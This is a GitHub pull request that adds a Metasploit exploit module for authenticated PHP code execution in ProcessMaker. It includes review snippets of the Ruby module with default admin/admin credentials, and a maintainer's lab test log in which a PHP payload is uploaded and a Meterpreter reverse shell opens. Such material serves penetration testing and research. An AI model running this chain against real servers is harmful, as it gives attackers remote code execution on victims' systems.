Add ProcessMaker Open Source Authenticated PHP Code Execution #2591

Merged
merged 1 commit into from Oct 29, 2013

Projects

None yet

2 participants

@bcoles
Contributor
bcoles commented Oct 29, 2013

Add ProcessMaker Open Source Authenticated PHP Code Execution exploit module.

Description:
ProcessMaker is an open source, workflow management software suite, which
includes tools to automate your workflow, design forms, create documents, assign
roles and users, create routing rules, and map an individual process quickly and
easily. It's relatively lightweight and doesn't require any kind of installation
on the client computer.

ProcessMaker Open Source Authenticated PHP Code Execution

@jvazquez-r7
Contributor

Processing...

@jvazquez-r7 jvazquez-r7 commented on the diff Oct 29, 2013
modules/exploits/multi/http/processmaker_exec.rb
+ ],
+ 'Privileged' => false, # Privileged on Windows but not on *nix targets
+ 'DisclosureDate' => 'Oct 24 2013',
+ 'DefaultTarget' => 0))
+
+ register_options(
+ [
+ OptString.new('USERNAME', [true, 'The username for ProcessMaker', 'admin']),
+ OptString.new('PASSWORD', [true, 'The password for ProcessMaker', 'admin'])
+ ], self.class)
+ end
+
+ #
+ # Clean up on new session
+ #
+ def on_new_session(client)
@jvazquez-r7
jvazquez-r7 Oct 29, 2013 Contributor

Isn't FiledDropper able to make its work :?

@jvazquez-r7 jvazquez-r7 commented on the diff Oct 29, 2013
modules/exploits/multi/http/processmaker_exec.rb
+ # send login request
+ print_status("#{peer} - Authenticating as user '#{user}'")
+ begin
+ res = send_request_cgi({
+ 'method' => 'POST',
+ 'uri' => normalize_uri(target_uri.path, "/sysworkflow/en/neoclassic/login/authentication.php"),
+ 'cookie' => @cookie,
+ 'vars_post' => vars_post
+ })
+ rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout, ::Timeout::Error, ::Errno::EPIPE
+ print_error("#{peer} - Connection failed")
+ end
+ if res and res.code == 200 and res.body =~ /Loading styles and images/
+ print_good("#{peer} - Authenticated as user '#{user}'")
+ else
+ fail_with(Failure::NoAccess, "#{peer} - Authenticating as user '#{user}' failed")
@jvazquez-r7
jvazquez-r7 Oct 29, 2013 Contributor

Don't use fail_with on methods called from check

@jvazquez-r7 jvazquez-r7 pushed a commit that referenced this pull request Oct 29, 2013
jvazquez-r7 Land #2591, @bcoles's exploit for ProcessMaker 1b75aef
@jvazquez-r7 jvazquez-r7 merged commit 3eed800 into rapid7:master Oct 29, 2013

1 check passed

default The Travis CI build passed
Details
@jvazquez-r7
Contributor

Hi @bcoles, cleanup for the comments can be found here: c4c171d

Has been landed because are minor things, easy to fix, and module is working ok :)

  • test check
msf exploit(processmaker_exec) > check

[*] 192.168.172.135:80 - Authenticating as user 'admin'
[-] 192.168.172.135:80 - Authenticating as user 'admin' failed
[*] Cannot reliably check exploitability.
msf exploit(processmaker_exec) > set password admin
password => admin
msf exploit(processmaker_exec) > check

[*] 192.168.172.135:80 - Authenticating as user 'admin'
[+] 192.168.172.135:80 - Authenticated as user 'admin'
[*] 192.168.172.135:80 - Sending check
[+] The target is vulnerable.
  • test exploit
msf exploit(processmaker_exec) > set password fail
password => fail
msf exploit(processmaker_exec) > exploit

[*] Started reverse handler on 192.168.172.1:4444
[*] 192.168.172.135:80 - Authenticating as user 'admin'
[-] 192.168.172.135:80 - Authenticating as user 'admin' failed
[-] Exploit failed [no-access]: 192.168.172.135:80 - Authentication failed
[*] Exploit completed, but no session was created.
msf exploit(processmaker_exec) > set password admin
password => admin
msf exploit(processmaker_exec) > exploit

[*] Started reverse handler on 192.168.172.1:4444
[*] 192.168.172.135:80 - Authenticating as user 'admin'
[+] 192.168.172.135:80 - Authenticated as user 'admin'
[*] 192.168.172.135:80 - Sending payload 'V7hd5EevO9Ho.php' (1795 bytes)
[+] 192.168.172.135:80 - Payload sent successfully
[*] 192.168.172.135:80 - Retrieving file 'V7hd5EevO9Ho.php'
[*] Sending stage (39195 bytes) to 192.168.172.135
[*] Meterpreter session 3 opened (192.168.172.1:4444 -> 192.168.172.135:32789) at 2013-10-29 09:53:08 -0500
[+] Deleted V7hd5EevO9Ho.php

^C[-] Exploit failed: Interrupt

meterpreter > getuid
Server username: www-data (33)
meterpreter > sysinfo
Computer    : processmaker
OS          : Linux processmaker 3.2.0-4-amd64 #1 SMP Debian 3.2.51-1 x86_64
Meterpreter : php/php
meterpreter > exit

Thanks!

@bcoles
Contributor
bcoles commented Oct 29, 2013

Thanks. Tested changes and confirmed working. 🔨🐢

@bcoles bcoles deleted the bcoles:processmaker_exec branch Nov 23, 2013
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment